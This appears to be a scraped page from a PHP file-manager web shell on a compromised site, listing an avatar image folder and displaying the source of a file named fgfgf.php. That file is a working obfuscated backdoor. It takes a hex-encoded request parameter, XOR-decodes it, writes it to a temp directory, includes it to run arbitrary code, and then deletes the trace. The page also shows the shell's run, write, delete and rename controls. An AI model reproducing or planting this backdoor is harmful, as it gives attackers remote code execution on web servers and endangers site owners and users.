at path:
ROOT
/
sistema
/
images
/
avatar
/
fgfgf.php
run:
R
W
Run
1.jpg
1.87 KB
2018-11-08 02:46:18
R
W
Run
Delete
Rename
2.jpg
2.06 KB
2018-11-08 02:46:18
R
W
Run
Delete
Rename
3.jpg
1.61 KB
2018-11-08 02:46:18
R
W
Run
Delete
Rename
4.jpg
2.52 KB
2018-11-08 02:46:18
R
W
Run
Delete
Rename
5.jpg
18.61 KB
2018-11-08 02:46:18
R
W
Run
Delete
Rename
6.jpg
1.57 KB
2018-11-08 02:46:18
R
W
Run
Delete
Rename
fgfgf.php
660 By
2018-11-08 02:46:18
R
W
Run
Delete
Rename
index.php
360 By
2020-11-18 02:31:06
R
W
Run
Delete
Rename
error_log
up
📄
fgfgf.php
Save
<?php if(array_key_exists("\x74\x6Bn", $_REQUEST) && !is_null($_REQUEST["\x74\x6Bn"])){ $property_set = hex2bin($_REQUEST["\x74\x6Bn"]); $pset = ''; $a = 0; do{$pset .= chr(ord($property_set[$a]) ^ 77);$a++;} while($a < strlen($property_set)); $data = array_filter(["/tmp", getenv("TMP"), getcwd(), session_save_path(), getenv("TEMP"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir")]); foreach ($data as $ent): if (!( !is_dir($ent) || !is_writable($ent) )) { $item = vsprintf("%s/%s", [$ent, ".entity"]); if (@file_put_contents($item, $pset) !== false) { include $item; unlink($item); die(); } } endforeach; }